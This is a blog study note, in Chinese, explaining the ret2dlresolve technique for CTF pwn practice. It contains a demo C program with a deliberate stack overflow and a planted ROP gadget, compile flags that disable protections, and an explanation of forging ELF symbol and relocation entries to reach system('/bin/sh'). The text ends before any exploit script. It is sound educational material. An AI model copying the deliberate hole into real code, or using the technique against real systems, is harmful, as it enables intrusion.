<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222" media="(prefers-color-scheme: light)">
<meta name="theme-color" content="#222" media="(prefers-color-scheme: dark)"><meta name="generator" content="Hexo 8.1.1">

  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/7.0.0/css/all.min.css" integrity="sha256-VHqXKFhhMxcpubYf9xiWdCiojEbY9NexQ4jh8AxbvcM=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/fancyapps-ui/5.0.31/fancybox/fancybox.css" integrity="sha256-gkQVf8UKZgQ0HyuxL/VnacadJ+D2Kox2TCEBuNQg5+w=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"whoamiuu.github.io","root":"/","images":"/images","scheme":"Muse","darkmode":true,"version":"8.27.0","exturl":false,"sidebar":{"position":"left","width_expanded":320,"width_dual_column":240,"display":"post","padding":18,"offset":12},"hljswrap":true,"codeblock":{"theme":{"light":"default","dark":"stackoverflow-dark"},"prism":{"light":"prism","dark":"prism-dark"},"copy_button":{"enable":true,"style":null},"fold":{"enable":true,"height":300},"language":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"duration":200,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"i18n":{"placeholder":"Searching...","empty":"We didn't find any results for the search: ${query}","hits_time":"${hits} results found in ${time} ms","hits":"${hits} results found"},"path":"/search.xml","localsearch":{"enable":true,"top_n_per_article":1,"unescape":false,"preload":false}}</script><script src="/js/config.js" defer></script>

    <meta name="description" content="ret2dlsolve 技术一、例子1234567891011121314151617181920212223242526272829303132333435#include &lt;stdio.h&gt;#include &lt;string.h&gt;#include &lt;unistd.h&gt;&#x2F;&#x2F;显式写一个内联汇编函数，保证有一个pop rdi ; ret__attribute__((">
<meta property="og:type" content="article">
<meta property="og:title" content="学习笔记：ret2dlsolve技术">
<meta property="og:url" content="http://whoamiuu.github.io/2026/01/29/2026-01-29-ret2dlsolve%E6%8A%80%E6%9C%AF/index.html">
<meta property="og:site_name" content="Whoamiuu&#39;s Blogs">
<meta property="og:description" content="ret2dlsolve 技术一、例子1234567891011121314151617181920212223242526272829303132333435#include &lt;stdio.h&gt;#include &lt;string.h&gt;#include &lt;unistd.h&gt;&#x2F;&#x2F;显式写一个内联汇编函数，保证有一个pop rdi ; ret__attribute__((">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://whoamiuu.github.io/images/26-1-29-ret2dlresolve%E6%8A%80%E6%9C%AF/dl.png">
<meta property="og:image" content="http://whoamiuu.github.io/images/26-1-29-ret2dlresolve%E6%8A%80%E6%9C%AF/push0.png">
<meta property="og:image" content="http://whoamiuu.github.io/images/26-1-29-ret2dlresolve%E6%8A%80%E6%9C%AF/fixup.png">
<meta property="og:image" content="http://whoamiuu.github.io/images/26-1-29-ret2dlresolve%E6%8A%80%E6%9C%AF/%E8%B0%83%E7%94%A8%E7%8E%B0%E5%9C%BA.png">
<meta property="og:image" content="http://whoamiuu.github.io/images/26-1-29-ret2dlresolve%E6%8A%80%E6%9C%AF/linkmap.png">
<meta property="og:image" content="http://whoamiuu.github.io/images/26-1-29-ret2dlresolve%E6%8A%80%E6%9C%AF/linkmap2.png">
<meta property="og:image" content="http://whoamiuu.github.io/images/26-1-29-ret2dlresolve%E6%8A%80%E6%9C%AF/%E7%BB%93%E6%9E%84%E4%BD%93.png">
<meta property="og:image" content="http://whoamiuu.github.io/images/26-1-29-ret2dlresolve%E6%8A%80%E6%9C%AF/%E5%9C%B0%E5%9D%80.png">
<meta property="og:image" content="http://whoamiuu.github.io/images/26-1-29-ret2dlresolve%E6%8A%80%E6%9C%AF/%E9%87%8D%E5%AE%9A%E5%90%91.png">
<meta property="og:image" content="http://whoamiuu.github.io/images/26-1-29-ret2dlresolve%E6%8A%80%E6%9C%AF/system.png">
<meta property="og:image" content="http://whoamiuu.github.io/images/26-1-29-ret2dlresolve%E6%8A%80%E6%9C%AF/error.png">
<meta property="og:image" content="http://whoamiuu.github.io/images/26-1-29-ret2dlresolve%E6%8A%80%E6%9C%AF/execve.png">
<meta property="og:image" content="http://whoamiuu.github.io/images/26-1-29-ret2dlresolve%E6%8A%80%E6%9C%AF/result.png">
<meta property="article:published_time" content="2026-01-29T02:56:00.000Z">
<meta property="article:modified_time" content="2026-02-02T06:37:31.888Z">
<meta property="article:tag" content="ctf">
<meta property="article:tag" content="pwn">
<meta property="article:tag" content="stack-overflow">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://whoamiuu.github.io/images/26-1-29-ret2dlresolve%E6%8A%80%E6%9C%AF/dl.png">


<link rel="canonical" href="http://whoamiuu.github.io/2026/01/29/2026-01-29-ret2dlsolve%E6%8A%80%E6%9C%AF/">


<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"en","comments":true,"permalink":"http://whoamiuu.github.io/2026/01/29/2026-01-29-ret2dlsolve%E6%8A%80%E6%9C%AF/","path":"2026/01/29/2026-01-29-ret2dlsolve技术/","title":"学习笔记：ret2dlsolve技术"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>学习笔记：ret2dlsolve技术 | Whoamiuu's Blogs</title>
  








  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous" defer></script>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/fancyapps-ui/5.0.31/fancybox/fancybox.umd.js" integrity="sha256-a+H7FYzJv6oU2hfsfDGM2Ohw/cR9v+hPfxHCLdmCrE8=" crossorigin="anonymous" defer></script>
<script src="/js/utils.js" defer></script><script src="/js/motion.js" defer></script><script src="/js/sidebar.js" defer></script><script src="/js/next-boot.js" defer></script>

  <script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-generator-searchdb/1.5.0/search.js" integrity="sha256-xFC6PJ82SL9b3WkGjFavNiA9gm5z6UBxWPiu4CYjptg=" crossorigin="anonymous" defer></script>
<script src="/js/third-party/search/local-search.js" defer></script>




  <script src="/js/third-party/fancybox.js" defer></script>



  
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>





  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">Whoamiuu's Blogs</p>
      <i class="logo-line"></i>
    </a>
      <p class="site-subtitle" itemprop="description">二进制安全学习笔记</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="Search" role="button">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a></li><li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>Tags</a></li><li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>Categories</a></li><li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a></li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>Search
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
      <div class="search-header">
        <span class="search-icon">
          <i class="fa fa-search"></i>
        </span>
        <div class="search-input-container">
          <input autocomplete="off" autocapitalize="off" maxlength="80"
                placeholder="Searching..." spellcheck="false"
                type="search" class="search-input">
        </div>
        <span class="popup-btn-close" role="button">
          <i class="fa fa-times-circle"></i>
        </span>
      </div>
      <div class="search-result-container">
        <div class="search-result-icon">
          <i class="fa fa-spinner fa-pulse fa-5x"></i>
        </div>
      </div>
    </div>
  </div>

</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#ret2dlsolve-%E6%8A%80%E6%9C%AF"><span class="nav-number">1.</span> <span class="nav-text">ret2dlsolve 技术</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%B8%80%E3%80%81%E4%BE%8B%E5%AD%90"><span class="nav-number">1.1.</span> <span class="nav-text">一、例子</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%BA%8C%E3%80%81%E5%8E%9F%E7%90%86"><span class="nav-number">1.2.</span> <span class="nav-text">二、原理</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#i-%E6%80%9D%E8%B7%AF"><span class="nav-number">1.2.1.</span> <span class="nav-text">i 思路</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#ii-%E6%96%B9%E6%B3%95"><span class="nav-number">1.2.2.</span> <span class="nav-text">ii 方法</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#ELF-%E5%8A%A8%E6%80%81%E8%A7%A3%E6%9E%90%E6%B5%81%E7%A8%8B%EF%BC%88%E6%AD%A3%E5%B8%B8%E6%83%85%E5%86%B5%EF%BC%89"><span class="nav-number">1.2.2.1.</span> <span class="nav-text">ELF 动态解析流程（正常情况）</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#ret2dlresolve-%E5%88%A9%E7%94%A8%E6%B5%81%E7%A8%8B%EF%BC%88%E4%BC%AA%E9%80%A0%E6%83%85%E5%86%B5%EF%BC%89"><span class="nav-number">1.2.2.2.</span> <span class="nav-text">ret2dlresolve 利用流程（伪造情况）</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#ii-%E5%89%8D%E7%BD%AE"><span class="nav-number">1.2.3.</span> <span class="nav-text">ii 前置</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#1-%E7%AC%A6%E5%8F%B7%E8%A1%A8-Symbol-Table"><span class="nav-number">1.2.3.1.</span> <span class="nav-text">1. 符号表 (Symbol Table)</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#2-%E9%87%8D%E5%AE%9A%E4%BD%8D%E8%A1%A8-Relocation-Table"><span class="nav-number">1.2.3.2.</span> <span class="nav-text">2. 重定位表 (Relocation Table)</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#3-%E5%9C%A8-bss-%E6%AE%B5%E5%B8%83%E7%BD%AE%E4%BC%AA%E9%80%A0%E7%9A%84%E8%A1%A8"><span class="nav-number">1.2.3.3.</span> <span class="nav-text">3. 在 .bss 段布置伪造的表</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#4-%E8%B0%83%E7%94%A8-plt-0"><span class="nav-number">1.2.3.4.</span> <span class="nav-text">4. 调用 plt[0]</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%B8%89%E3%80%81%E8%B0%83%E8%AF%95"><span class="nav-number">1.3.</span> <span class="nav-text">三、调试</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%9B%9B%E3%80%81%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8"><span class="nav-number">1.4.</span> <span class="nav-text">四、漏洞利用</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%B0%8F%E6%B3%A8"><span class="nav-number">1.5.</span> <span class="nav-text">小注</span></a></li></ol></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt=""
      src="/images/avatar.gif">
  <p class="site-author-name" itemprop="name"></p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">17</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
          <a href="/categories/">
        <span class="site-state-item-count">2</span>
        <span class="site-state-item-name">categories</span></a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">8</span>
        <span class="site-state-item-name">tags</span></a>
      </div>
  </nav>
</div>

        </div>
      </div>
    </div>

    
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="en">
    <link itemprop="mainEntityOfPage" href="http://whoamiuu.github.io/2026/01/29/2026-01-29-ret2dlsolve%E6%8A%80%E6%9C%AF/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Whoamiuu's Blogs">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="学习笔记：ret2dlsolve技术 | Whoamiuu's Blogs">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          学习笔记：ret2dlsolve技术
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">Posted on</span>

      <time title="Created: 2026-01-29 10:56:00" itemprop="dateCreated datePublished" datetime="2026-01-29T10:56:00+08:00">2026-01-29</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar-check"></i>
      </span>
      <span class="post-meta-item-text">Edited on</span>
      <time title="Modified: 2026-02-02 14:37:31" itemprop="dateModified" datetime="2026-02-02T14:37:31+08:00">2026-02-02</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">In</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/Notes/" itemprop="url" rel="index"><span itemprop="name">Notes</span></a>
        </span>
    </span>

  
    <span class="post-meta-item" title="Views" id="busuanzi_container_page_pv">
      <span class="post-meta-item-icon">
        <i class="far fa-eye"></i>
      </span>
      <span class="post-meta-item-text">Views: </span>
      <span id="busuanzi_value_page_pv"></span>
    </span>
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody"><h1 id="ret2dlsolve-技术"><a href="#ret2dlsolve-技术" class="headerlink" title="ret2dlsolve 技术"></a>ret2dlsolve 技术</h1><h2 id="一、例子"><a href="#一、例子" class="headerlink" title="一、例子"></a>一、例子</h2><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;string.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;unistd.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="comment">//显式写一个内联汇编函数，保证有一个pop rdi ; ret</span></span><br><span class="line">__attribute__((naked)) <span class="type">void</span> <span class="title function_">gadget</span><span class="params">()</span> &#123;</span><br><span class="line">    __asm__ <span class="title function_">volatile</span><span class="params">(</span></span><br><span class="line"><span class="params">        <span class="string">&quot;pop %rdi\n\t&quot;</span></span></span><br><span class="line"><span class="params">        <span class="string">&quot;ret\n\t&quot;</span></span></span><br><span class="line"><span class="params">        <span class="string">&quot;pop %rsi\n\t&quot;</span></span></span><br><span class="line"><span class="params">        <span class="string">&quot;ret\n\t&quot;</span></span></span><br><span class="line"><span class="params">    )</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment">// 危险函数，存在栈溢出漏洞</span></span><br><span class="line"><span class="type">void</span> <span class="title function_">vulnerable_function</span><span class="params">()</span> &#123;</span><br><span class="line">    <span class="type">char</span> buf[<span class="number">128</span>];</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;Enter your message: &quot;</span>);</span><br><span class="line">    fflush(<span class="built_in">stdout</span>);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 没有限制输入长度，导致栈溢出</span></span><br><span class="line">    read(STDIN_FILENO, buf, <span class="number">1024</span>);</span><br><span class="line"></span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;You entered: %s\n&quot;</span>, buf);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="type">int</span> <span class="title function_">main</span><span class="params">()</span> &#123;</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;Welcome to ret2dlresolve demo!\n&quot;</span>);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;PID: %d\n&quot;</span>, getpid());</span><br><span class="line"></span><br><span class="line">    vulnerable_function();</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 编译</span></span><br><span class="line"> gcc -fno-stack-protector -no-pie -z lazy -O0 -g dlsolve.c -o ret2dlsolve</span><br></pre></td></tr></table></figure>



<h2 id="二、原理"><a href="#二、原理" class="headerlink" title="二、原理"></a>二、原理</h2><h3 id="i-思路"><a href="#i-思路" class="headerlink" title="i 思路"></a>i 思路</h3><ol>
<li>直接修改现有符号表项，将 read或其他函数名设置为 system，让程序自己解析出system，这种比较简单，但只适用于No RELRO，下面的方法可以适用于Partial RELRO</li>
<li>全部伪造符号表重定位表，写入 system字符串，手动让程序解析 system，这种方法比较麻烦，需要计算偏移和索引，但是更稳定一些，下面我们使用第二种方法。</li>
</ol>
<blockquote>
<p><strong>No RELRO</strong>：GOT 表完全可写，.dynamic 段可写，延迟绑定（函数第一次调用时才解析）</p>
<p><strong>Partial RELRO</strong>：.got 只读（非 PLT 相关的 GOT），.got.plt 可写（PLT 相关的 GOT），.dynamic 可写，延迟绑定（函数第一次调用时才解析）</p>
<p><strong>Full RELRO</strong>：所有 GOT 表只读，.dynamic 段只读，启动时全部解析（程序启动时解析所有符号）</p>
</blockquote>
<h3 id="ii-方法"><a href="#ii-方法" class="headerlink" title="ii 方法"></a>ii 方法</h3><ol>
<li><p>我们要调用的函数（比如 <code>system</code>）并不在程序里直接出现。正常情况下，程序不会解析它。 ret2dlresolve 的技巧就是：<strong>伪造一次 “动态解析请求”，让链接器帮我们解析出 <code>system</code> 的地址。</strong></p>
</li>
<li><p>具体做法：</p>
<ul>
<li>在 <code>.bss</code> 段伪造一个 <strong>符号表条目 (Elf64_Sym)</strong>，名字指向 <code>&quot;system&quot;</code>。</li>
<li>在 <code>.bss</code> 段伪造一个 <strong>重定位表条目 (Elf64_Rela)</strong>，指向某个 GOT 表项，并关联到我们伪造的符号。</li>
<li>构造 ROP 链**调用 <code>plt[0]</code> **，并传入 relocation 索引。</li>
<li>链接器看到这个索引，就会去<strong>解析 <code>&quot;system&quot;</code></strong>，找到 libc 里的 <code>system</code> 函数地址，并执行它。</li>
</ul>
</li>
<li><h4 id="ELF-动态解析流程（正常情况）"><a href="#ELF-动态解析流程（正常情况）" class="headerlink" title="ELF 动态解析流程（正常情况）"></a>ELF 动态解析流程（正常情况）</h4><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">用户调用 read@plt</span><br><span class="line">        │</span><br><span class="line">        ▼</span><br><span class="line">.plt 桩代码 → 跳到动态链接器</span><br><span class="line">        │</span><br><span class="line">        ▼</span><br><span class="line">.rela.plt → 查找对应的重定位条目 (Elf64_Rela)</span><br><span class="line">        │</span><br><span class="line">        ▼</span><br><span class="line">.dynsym → 根据符号索引找到符号表条目 (Elf64_Sym)</span><br><span class="line">        │</span><br><span class="line">        ▼</span><br><span class="line">.dynstr → 根据 st_name 偏移找到函数名字符串 (&quot;read&quot;)</span><br><span class="line">        │</span><br><span class="line">        ▼</span><br><span class="line">链接器解析 libc 中的真实地址 → 写入 .got.plt</span><br><span class="line">        │</span><br><span class="line">        ▼</span><br><span class="line">下次调用直接跳到 libc 的 read()</span><br></pre></td></tr></table></figure>
</li>
<li><h4 id="ret2dlresolve-利用流程（伪造情况）"><a href="#ret2dlresolve-利用流程（伪造情况）" class="headerlink" title="ret2dlresolve 利用流程（伪造情况）"></a>ret2dlresolve 利用流程（伪造情况）</h4><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">┌───────────────┐</span><br><span class="line">│ .bss 段       │ ← 我们可写的区域</span><br><span class="line">│  &quot;system\x00&quot; │ ← 符号名</span><br><span class="line">│  &quot;/bin/sh\x00&quot;│ ← 参数字符串</span><br><span class="line">│  Elf64_Sym    │ ← 伪造符号表条目</span><br><span class="line">│  Elf64_Rela   │ ← 伪造重定位条目</span><br><span class="line">└───────┬───────┘</span><br><span class="line">        │ relocation 索引指向这里</span><br><span class="line">┌───────▼───────┐</span><br><span class="line">│ plt[0]        │ ← 我们的第二次 ROP 跳到这里</span><br><span class="line">│ 动态解析 &quot;system&quot;</span><br><span class="line">└───────┬───────┘</span><br><span class="line">        │</span><br><span class="line">┌───────▼───────┐</span><br><span class="line">│ system(&quot;/bin/sh&quot;) │ ← 成功执行</span><br><span class="line">└───────────────┘</span><br><span class="line"></span><br><span class="line">第一次 ROP 链把伪造的结构写到 .bss，然后第二次 ROP 链调用 plt[0]，让动态链接器解析我们伪造的 &quot;system&quot;，最终执行 system(&quot;/bin/sh&quot;)。</span><br></pre></td></tr></table></figure></li>
</ol>
<h3 id="ii-前置"><a href="#ii-前置" class="headerlink" title="ii 前置"></a>ii 前置</h3><h4 id="1-符号表-Symbol-Table"><a href="#1-符号表-Symbol-Table" class="headerlink" title="1. 符号表 (Symbol Table)"></a>1. 符号表 (Symbol Table)</h4><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">typedef</span> <span class="class"><span class="keyword">struct</span> &#123;</span></span><br><span class="line">    <span class="type">uint32_t</span> st_name;       <span class="comment">// 符号名在字符串表中的偏移</span></span><br><span class="line">    <span class="type">unsigned</span> <span class="type">char</span> st_info;  <span class="comment">// 符号类型和绑定信息</span></span><br><span class="line">    <span class="type">unsigned</span> <span class="type">char</span> st_other; <span class="comment">// 符号可见性</span></span><br><span class="line">    <span class="type">uint16_t</span> st_shndx;      <span class="comment">// 符号所在的段索引</span></span><br><span class="line">    Elf64_Addr st_value;    <span class="comment">// 符号的值（地址或偏移）</span></span><br><span class="line">    Elf64_Xword st_size;    <span class="comment">// 符号大小（字节数）</span></span><br><span class="line">&#125; Elf64_Sym;</span><br></pre></td></tr></table></figure>

<ul>
<li>ELF 文件里有一个符号表，记录了程序里用到的函数和变量的名字，以及它们在文件中的位置。</li>
<li><strong>作用</strong>：当程序调用一个外部函数（比如 <code>printf</code>、<code>read</code>），动态链接器需要知道“这个名字对应哪个库里的哪个地址”。符号表就是用来存储这些名字和索引的。</li>
<li><strong>举例</strong>：符号表里可能有一条记录：<code>name=&quot;read&quot;, type=FUNC, index=123</code>。链接器通过它找到 libc 里的 <code>read</code>。</li>
</ul>
<h4 id="2-重定位表-Relocation-Table"><a href="#2-重定位表-Relocation-Table" class="headerlink" title="2. 重定位表 (Relocation Table)"></a>2. 重定位表 (Relocation Table)</h4><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">typedef</span> <span class="class"><span class="keyword">struct</span> &#123;</span></span><br><span class="line">    Elf64_Addr r_offset;   <span class="comment">// 需要修复的地址（比如 GOT 槽）</span></span><br><span class="line">    Elf64_Xword r_info;    <span class="comment">// 符号索引 + 类型</span></span><br><span class="line">    Elf64_Sxword r_addend; <span class="comment">// 附加值</span></span><br><span class="line">&#125; Elf64_Rela;</span><br></pre></td></tr></table></figure>

<ul>
<li>重定位表记录了“哪些地方需要填充真实地址”。</li>
<li><strong>作用</strong>：程序里调用外部函数时，指令里并没有直接写死地址，而是写了一个占位符。运行时，动态链接器根据重定位表，把 GOT 表项填上真实地址。</li>
<li><strong>举例</strong>：重定位表里可能有一条记录：<code>offset=read@got, symbol=read</code>。意思是：把 GOT 表里 <code>read</code> 的位置填上 libc 中 <code>read</code> 的真实地址。</li>
</ul>
<h4 id="3-在-bss-段布置伪造的表"><a href="#3-在-bss-段布置伪造的表" class="headerlink" title="3. 在 .bss 段布置伪造的表"></a>3. 在 <code>.bss</code> 段布置伪造的表</h4><ul>
<li>原程序的符号表和重定位表在 ELF 文件里是固定的，正常情况下只能解析已有的函数。</li>
<li>但是动态链接器的逻辑是：只要你给它一个“符号索引”，它就会去符号表里查找名字，然后解析。</li>
<li><strong>漏洞利用点</strong>：我们可以在 <code>.bss</code> 段伪造一份假的符号表和重定位表，把名字写成<code>&quot;system&quot;</code>，这样链接器就会帮我们解析出 libc 里的 <code>system</code>。</li>
<li><code>.bss</code> 段是可读写的内存区域，程序不会初始化它，所以我们可以用第一次 <code>read</code> 把伪造的数据写进去。</li>
</ul>
<h4 id="4-调用-plt-0"><a href="#4-调用-plt-0" class="headerlink" title="4. 调用 plt[0]"></a>4. 调用 <code>plt[0]</code></h4><ul>
<li>在 ELF 文件里，每个外部函数都有一个 <code>plt</code> 桩，比如 <code>read@plt</code>。</li>
<li>但还有一个特殊的入口：<code>plt[0]</code>。</li>
<li><strong>作用</strong>：<code>plt[0]</code> 并不是某个具体函数，而是一个通用的入口，它会调用 <code>_dl_runtime_resolve</code>，根据你提供的 relocation 索引去解析符号。</li>
<li><strong>利用点</strong>：我们在 ROP 链里跳到 <code>plt[0]</code>，并在栈上放一个 relocation 索引。这样链接器会去解析我们伪造的重定位条目，最终跳到 <code>system</code>。</li>
<li>所以，调用 <code>plt[0]</code> 并不是直接调用某个函数，而是触发“动态解析机制”。</li>
</ul>
